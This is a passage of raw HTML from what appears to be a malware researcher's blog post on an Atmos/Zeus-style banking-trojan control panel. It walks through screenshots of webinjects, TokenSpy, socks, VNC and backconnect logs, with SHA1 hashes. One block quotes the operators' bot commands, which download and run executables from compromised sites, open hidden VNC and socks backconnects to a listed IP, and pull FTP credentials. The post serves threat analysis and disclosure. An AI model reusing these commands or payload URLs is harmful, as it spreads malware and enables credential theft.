&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEgO_exq3GQiPDwO1HbAAEQJTWkapQB3EiqrfpmpBcfe9NL5c4zv9VoUWx6XjhcDL8OJqeRD8xACEA-RmrTr5OBU88UlTkVZ-zJuFYQznqlAyUTMU8bhIN6y33WbtVpJhdiX8NdBe__cs/s1600/2015-11-02_16-38-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEgO_exq3GQiPDwO1HbAAEQJTWkapQB3EiqrfpmpBcfe9NL5c4zv9VoUWx6XjhcDL8OJqeRD8xACEA-RmrTr5OBU88UlTkVZ-zJuFYQznqlAyUTMU8bhIN6y33WbtVpJhdiX8NdBe__cs/s400/2015-11-02_16-38-11.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Webinjects for the group &#39;Canada&#39;:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB4acNrYEHDk15EsOyH18sRklY2Pdnt7IQZVUOfbzSHwexHlV0MZhUJBGDheE2A3X9ea69xIH-eaVBypey6A1EVYIzu6vKT5dHVpH1bK4ky0Pvmz9cGvHbZA3O5UF7oVX-MMhLWZE2nok/s1600/2015-11-17_15-40-05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB4acNrYEHDk15EsOyH18sRklY2Pdnt7IQZVUOfbzSHwexHlV0MZhUJBGDheE2A3X9ea69xIH-eaVBypey6A1EVYIzu6vKT5dHVpH1bK4ky0Pvmz9cGvHbZA3O5UF7oVX-MMhLWZE2nok/s400/2015-11-17_15-40-05.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
US:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOQJdZ22sOiGyeve-IDBXIFK4afmcl2U0DxTor_XKHV4A8wo3-yaPyu_ntNHzef-RkX75Xs3ZBKZ2ExQTD8bRxnGiaY41jl4SLH9tbEVenGKUbILk_vv9WZiTABHF6w8OvmRufkMOV-VI/s1600/2015-11-17_15-41-53.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOQJdZ22sOiGyeve-IDBXIFK4afmcl2U0DxTor_XKHV4A8wo3-yaPyu_ntNHzef-RkX75Xs3ZBKZ2ExQTD8bRxnGiaY41jl4SLH9tbEVenGKUbILk_vv9WZiTABHF6w8OvmRufkMOV-VI/s400/2015-11-17_15-41-53.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
Edit a webinject:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHhw28B68xI1oZGbh91icWw32uAhlP9ArOdG2mU7hOOYSwN6to6bT5_bSo8NnM1VYqRc1gOzC2BIaGZtBOiVsPy1ZY0LRg_XBAvRI16mN_-XUaQ7GUrWCN63Hccp8MOf725TYWw26Wdwc/s1600/2015-11-17_15-41-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHhw28B68xI1oZGbh91icWw32uAhlP9ArOdG2mU7hOOYSwN6to6bT5_bSo8NnM1VYqRc1gOzC2BIaGZtBOiVsPy1ZY0LRg_XBAvRI16mN_-XUaQ7GUrWCN63Hccp8MOf725TYWw26Wdwc/s400/2015-11-17_15-41-06.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Script:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rghO8YIN0gVSLw0eRRIwxxx5baj3jH5tQ7M8yKoYpgUhs8gSBSlIV22VBoei9XVlfqZIz8tsiz3RuUn74Ya62TLrcPwLHPjGHePlhJvOcEZ3qz_2Xg4-63vfEXuglgM5goRGlnJ_6Co/s1600/2015-11-02_16-39-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rghO8YIN0gVSLw0eRRIwxxx5baj3jH5tQ7M8yKoYpgUhs8gSBSlIV22VBoei9XVlfqZIz8tsiz3RuUn74Ya62TLrcPwLHPjGHePlhJvOcEZ3qz_2Xg4-63vfEXuglgM5goRGlnJ_6Co/s400/2015-11-02_16-39-13.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Script edit:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL525mIDDvn556Q9R9EGButIiM_0J-js-V-36h1fGNPPuXJQh_yihbB2i5xyDf30zUsJbLvA_Px5u68dtoav7ATTFb7IOw9IDgpadEfO7aJQxjx3nghVRXeFLTu5Cppj3soYFvz4fBSeM/s1600/2015-11-02_16-45-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL525mIDDvn556Q9R9EGButIiM_0J-js-V-36h1fGNPPuXJQh_yihbB2i5xyDf30zUsJbLvA_Px5u68dtoav7ATTFb7IOw9IDgpadEfO7aJQxjx3nghVRXeFLTu5Cppj3soYFvz4fBSeM/s400/2015-11-02_16-45-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Some scripts sample:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
tokenspy_update tokenspy-config.json&lt;br /&gt;
hvnc_start 176.9.174.237 29223&lt;br /&gt;
bot_bc_add vnc&lt;br /&gt;
bot_bc_add socks 176.9.174.237 37698&lt;br /&gt;
user_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe&lt;br /&gt;
transfer&lt;br /&gt;
user_destroy&lt;br /&gt;
user_execute http://iguana58.ru/plugins/system/anticopy/adobe.exe&lt;br /&gt;
user_ftpclients_get&lt;br /&gt;
user_execute htxp://iguana58.ru/plugins/system/anticopy/adobe.exe&lt;br /&gt;
user_execute htxp://mareikes.com/wp-includes/pomo/svhost.exe -f&lt;br /&gt;
user_execute htxp://mareikes.com/wp-includes/pomo/server.exe&lt;br /&gt;
user_execute htxp://mareikes.com/wp-includes/pomo/ammy.exe&lt;br /&gt;
user_execute http://tehnoart.co/sr.exe -f&lt;br /&gt;
user_execute http://3dmaxkursum.net/tmp/sys/config.exe&lt;br /&gt;
user_execute http://coasttransit.com/wp-content/gallery/gulfport-transit-center/thumbs/htasees.exe&lt;/div&gt;
• dns: 1 ›› ip: 185.4.73.33 - adress: IGUANA58.RU&lt;br /&gt;
• dns: 1 ›› ip: 176.9.24.49 - adress: MAREIKES.COM&lt;br /&gt;
• dns: 1 ›› ip: 107.180.26.93 - adress: TEHNOART.CO&lt;br /&gt;
• dns: 1 ›› ip: 94.73.144.210 - adress: 3DMAXKURSUM.NET&lt;br /&gt;
• dns: 1 ›› ip: 184.168.47.225 - adress: COASTTRANSIT.COM&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Socks:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-t0qGZ3ckAgrWQgbuMAFOu9hq0nVCBCqmgUCzvt5HCBfNVRTPta4tSyMeQ0pIFYCkra_XFXbPh_43mtHDlidh0TC1LiFC45BydUAchw53Au52JP6DTLeyBZVlGwPxN8n7zUjOdjbBFKE/s1600/2015-11-02_16-47-00.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-t0qGZ3ckAgrWQgbuMAFOu9hq0nVCBCqmgUCzvt5HCBfNVRTPta4tSyMeQ0pIFYCkra_XFXbPh_43mtHDlidh0TC1LiFC45BydUAchw53Au52JP6DTLeyBZVlGwPxN8n7zUjOdjbBFKE/s400/2015-11-02_16-47-00.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
VNC:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo5dofRVUnBqY1ZR0IW-fBgLt0zknOolBQVn1b_FCLaT1n6-5T6VvIR2HyUxIzIBl4Gm_zFOcTiobgoFKh88rAs7c3qaeXjxPZK88WH3B8n0LDxPpYq_Ke8BF2_OciqQo0swefW8siils/s1600/2015-11-02_16-48-03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo5dofRVUnBqY1ZR0IW-fBgLt0zknOolBQVn1b_FCLaT1n6-5T6VvIR2HyUxIzIBl4Gm_zFOcTiobgoFKh88rAs7c3qaeXjxPZK88WH3B8n0LDxPpYq_Ke8BF2_OciqQo0swefW8siils/s400/2015-11-02_16-48-03.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Example of infected endpoints:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhshbOF43LaZ381Z1V13Ah9PexzKmFqyKshQZelGoOdOIei7e9E5Z7Sza0xlRIIhDHx-DBM1shQYRjTtD4sdb9O5lJEgDa18WLVF_0td3mGHreSEa3Ik3svR5IexI_zKsHtGj4SVRoK1e8/s1600/2015-11-06_12-22-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;238&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhshbOF43LaZ381Z1V13Ah9PexzKmFqyKshQZelGoOdOIei7e9E5Z7Sza0xlRIIhDHx-DBM1shQYRjTtD4sdb9O5lJEgDa18WLVF_0td3mGHreSEa3Ik3svR5IexI_zKsHtGj4SVRoK1e8/s400/2015-11-06_12-22-18.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvPCzvXkkMcW36qBqt_3LI188sJmp1UTFqK6Q3sR66tGJ2QaSp2M7ZqKCo8gM4FNffak7edY0RqZC8djmzpTdHYgOzGgiCMGJiBDGJXDprcgAiulBTefCgu6-kScT7dlFvMNJhYx6U1yo/s1600/2015-11-05_18-41-40.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;323&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvPCzvXkkMcW36qBqt_3LI188sJmp1UTFqK6Q3sR66tGJ2QaSp2M7ZqKCo8gM4FNffak7edY0RqZC8djmzpTdHYgOzGgiCMGJiBDGJXDprcgAiulBTefCgu6-kScT7dlFvMNJhYx6U1yo/s400/2015-11-05_18-41-40.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Config:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUGxDPpRq1logIxAJNfEwR4LyhW-wuvaGyTjoNSUNWRxb7UAOJomcAYN8DrPezD6b-IO3Ar7CnmX_nHufUHclGCylwo58rZSdz3GEK3d5F1u-gG-m7TwmFcO8p1SZUkHJUXqrBhvlcqw/s1600/2015-11-02_19-37-40.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;165&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUGxDPpRq1logIxAJNfEwR4LyhW-wuvaGyTjoNSUNWRxb7UAOJomcAYN8DrPezD6b-IO3Ar7CnmX_nHufUHclGCylwo58rZSdz3GEK3d5F1u-gG-m7TwmFcO8p1SZUkHJUXqrBhvlcqw/s400/2015-11-02_19-37-40.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Backconnect logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOjzDdz8xf_FLouJB_56sdMr37HJTJ7G6C7BCzK0kBBeGzsPQm5k5wQTfogFLEFhq3Lcx6l6TcqurWcAptDAFVKGLRKF3hyphenhyphen-mY2yOc8fZjsXHuSC3jN0Iw-H15SlasuwdBAV5IAe73BEw/s1600/2015-11-29_13-29-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOjzDdz8xf_FLouJB_56sdMr37HJTJ7G6C7BCzK0kBBeGzsPQm5k5wQTfogFLEFhq3Lcx6l6TcqurWcAptDAFVKGLRKF3hyphenhyphen-mY2yOc8fZjsXHuSC3jN0Iw-H15SlasuwdBAV5IAe73BEw/s400/2015-11-29_13-29-21.png&quot; width=&quot;315&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Files:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjazG01rZwPcavS0moKTzQVxuzpo8Dml_hznJiXD8HIFQGUaF2fWUxJ1TYRLvpHWAEhrqyfQkFxaNkMnS5EZDAhLwXVzkx5SVOjlEJ6Ld08RL5Y0fQzG4EP16PkFrceJAn43cOSz1G6WZU/s1600/2015-11-29_14-21-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;276&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjazG01rZwPcavS0moKTzQVxuzpo8Dml_hznJiXD8HIFQGUaF2fWUxJ1TYRLvpHWAEhrqyfQkFxaNkMnS5EZDAhLwXVzkx5SVOjlEJ6Ld08RL5Y0fQzG4EP16PkFrceJAn43cOSz1G6WZU/s400/2015-11-29_14-21-41.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg27ykKKn-JPj3HP9DtawGtS4Frn659V9Ec-7dMM_1UFZfZ8AHVYJdcTnghyphenhyphen6MRWa2sdOiF6xo05qSz9YM4MMsB7zoaGqThpfN1uWs9JtSpzo9ZdxtZTPMcNkdMz45NsMuB0EsaQ087Ies/s1600/2015-11-29_14-27-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;197&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg27ykKKn-JPj3HP9DtawGtS4Frn659V9Ec-7dMM_1UFZfZ8AHVYJdcTnghyphenhyphen6MRWa2sdOiF6xo05qSz9YM4MMsB7zoaGqThpfN1uWs9JtSpzo9ZdxtZTPMcNkdMz45NsMuB0EsaQ087Ies/s400/2015-11-29_14-27-29.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
SHA1: 9EA4041C41C3448E5A9D00EEA9DACB9E11EBA6C0&lt;br /&gt;
&lt;br /&gt;
bcservice.ini:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;bcservice&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
client_starting_port=200&lt;br /&gt;
bots_port=30&lt;br /&gt;
reboot_every_m=10&lt;/div&gt;
&lt;br /&gt;
Trashed binnaries:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtgSU1F_S5dwnXeW_kntpJt9qdL9mtXDiEt_E0WhBnO6p6gtoFzvGSbSttM3eJTepqZ9enptulPDvaNYsSxxYrW3tHGhA4irt-VJcHPIBZVIc0baTD96oTvsrUwb2kVIq9KBR7NJI0rkg/s1600/2015-11-29_14-37-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;147&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtgSU1F_S5dwnXeW_kntpJt9qdL9mtXDiEt_E0WhBnO6p6gtoFzvGSbSttM3eJTepqZ9enptulPDvaNYsSxxYrW3tHGhA4irt-VJcHPIBZVIc0baTD96oTvsrUwb2kVIq9KBR7NJI0rkg/s400/2015-11-29_14-37-02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXvZMLtEMc4mNUqI3kWAEVDIUy-MjnpRCL0PmTCYdZgV0u2egn9tE_AzkiLx54ImaR6IAJ2LY6b12vobLxyQpEbzC-dtjUYPSuvYRib0uZfbouGV7MdUvTU0M84Lkpw0HpCxdywvd5os/s1600/2015-11-29_14-45-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;197&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXvZMLtEMc4mNUqI3kWAEVDIUy-MjnpRCL0PmTCYdZgV0u2egn9tE_AzkiLx54ImaR6IAJ2LY6b12vobLxyQpEbzC-dtjUYPSuvYRib0uZfbouGV7MdUvTU0M84Lkpw0HpCxdywvd5os/s400/2015-11-29_14-45-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
SHA1: 987B468DB8AA400171E5365E89C3120F13F728EE&lt;br /&gt;
&lt;br /&gt;
Atmos builder:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkHNZAZg_dBQ3WqkOkmAYJJizdEu6J9KKq7O2gojlXqAQmbTxvEARYUGxEEDCKYjgWTvcIUAGGTQpdP6CjWocFYYnMNEf27RttyyT6p14a8qsISUn16G4Jp-IYZ_0g0V1WZnI6twAjvw/s1600/2016-05-03_19-01-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;391&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkHNZAZg_dBQ3WqkOkmAYJJizdEu6J9KKq7O2gojlXqAQmbTxvEARYUGxEEDCKYjgWTvcIUAGGTQpdP6CjWocFYYnMNEf27RttyyT6p14a8qsISUn16G4Jp-IYZ_0g0V1WZnI6twAjvw/s400/2016-05-03_19-01-18.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;SHA1: D3F992DCDBB0DF54C4A383163172F69A1CA967AE&lt;br /&gt;
&lt;br /&gt;
Server logs start the 3 oct 2015:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQLpP06lxTFk8L3g7piFIAvFZuYyk-YFHDP540K05H8tZq3kKWfWFMvVameH4_AryVi46RJz04M-ENSYuFKpSVLV2swB1joowM3oEnaNT_xS3IJJjI9z48V_A1OcbznUfMdyN7T87nWnc/s1600/2015-11-29_14-59-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;73&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQLpP06lxTFk8L3g7piFIAvFZuYyk-YFHDP540K05H8tZq3kKWfWFMvVameH4_AryVi46RJz04M-ENSYuFKpSVLV2swB1joowM3oEnaNT_xS3IJJjI9z48V_A1OcbznUfMdyN7T87nWnc/s400/2015-11-29_14-59-18.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
TokenSpy:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoj4fQmh7NzHDAMnv701YXpOWLneFH0jBRWebv89kH0HLNlzXydH2eIXzDJOqzM-dUOiGaXLY_KSUfsyYRzOobQ4wjHLGGlXwl2xnMSNTSxWNKAXChD8dLbN0J74-0nZjkRqVlrKqiBwM/s1600/2015-11-02_16-48-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoj4fQmh7NzHDAMnv701YXpOWLneFH0jBRWebv89kH0HLNlzXydH2eIXzDJOqzM-dUOiGaXLY_KSUfsyYRzOobQ4wjHLGGlXwl2xnMSNTSxWNKAXChD8dLbN0J74-0nZjkRqVlrKqiBwM/s400/2015-11-02_16-48-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmIIvJ8Lm3e5oLrp9xtTc6RcfxI9tZ2JFrrHW8A7VV9K5SKI3CwcVwB4ysw34rYFNAxTieFfbzOD9nmaabTFQFjmHy6Hf3peIiJruYOWjTfQEjbIA8wfpuAcNr3JXtec40D_kkLZ96WxM/s1600/2016-02-18_19-15-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;256&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmIIvJ8Lm3e5oLrp9xtTc6RcfxI9tZ2JFrrHW8A7VV9K5SKI3CwcVwB4ysw34rYFNAxTieFfbzOD9nmaabTFQFjmHy6Hf3peIiJruYOWjTfQEjbIA8wfpuAcNr3JXtec40D_kkLZ96WxM/s400/2016-02-18_19-15-34.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
With a nice ring animation :)&lt;br /&gt;
&lt;br /&gt;
Rule/test:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwEZd-D8ypPciRAA8LeWVC01CKlM0halbrYP6TFXwU4AwxDKSpZq-TCD0xH0GPCX6cgUpWDRga2IRNPxwFVI8HwF2cCQUTRr7mOTbBv6xDm6YYsSPypch7Pbltk2jFj-dQZvXRAqhRfec/s1600/2015-11-02_16-49-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwEZd-D8ypPciRAA8LeWVC01CKlM0halbrYP6TFXwU4AwxDKSpZq-TCD0xH0GPCX6cgUpWDRga2IRNPxwFVI8HwF2cCQUTRr7mOTbBv6xDm6YYsSPypch7Pbltk2jFj-dQZvXRAqhRfec/s400/2015-11-02_16-49-38.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_HUccXW_a_ajen4ih1uAqTD2g-fgSFQCvWqJXLgeeKSB6DsUrkGZY3qy-EnKuDCoSoyjz4_-09wCBEq9pkyRHh8g71GyJxwD-HI54sQHWWGmPiY0btF1QyDG6HiDHQfdKU3yLaR5lRnc/s1600/2015-11-02_16-50-51.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_HUccXW_a_ajen4ih1uAqTD2g-fgSFQCvWqJXLgeeKSB6DsUrkGZY3qy-EnKuDCoSoyjz4_-09wCBEq9pkyRHh8g71GyJxwD-HI54sQHWWGmPiY0btF1QyDG6HiDHQfdKU3yLaR5lRnc/s400/2015-11-02_16-50-51.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;Search database:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF78vyKq8bU5LDKQeSOEG4z2BeJsFmM9r4a2KmoJcqH26prqQg1D0I9xG8_5qdGW4auh00vHwX2syPcgK-bVkNjPV9yRwwEB50yKKdrvTG7tDrTuftN6Kwsmz3pMh5EO8lmK6O5zqOcjE/s1600/2015-11-02_16-51-36.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF78vyKq8bU5LDKQeSOEG4z2BeJsFmM9r4a2KmoJcqH26prqQg1D0I9xG8_5qdGW4auh00vHwX2syPcgK-bVkNjPV9yRwwEB50yKKdrvTG7tDrTuftN6Kwsmz3pMh5EO8lmK6O5zqOcjE/s400/2015-11-02_16-51-36.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&amp;nbsp;Search list:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
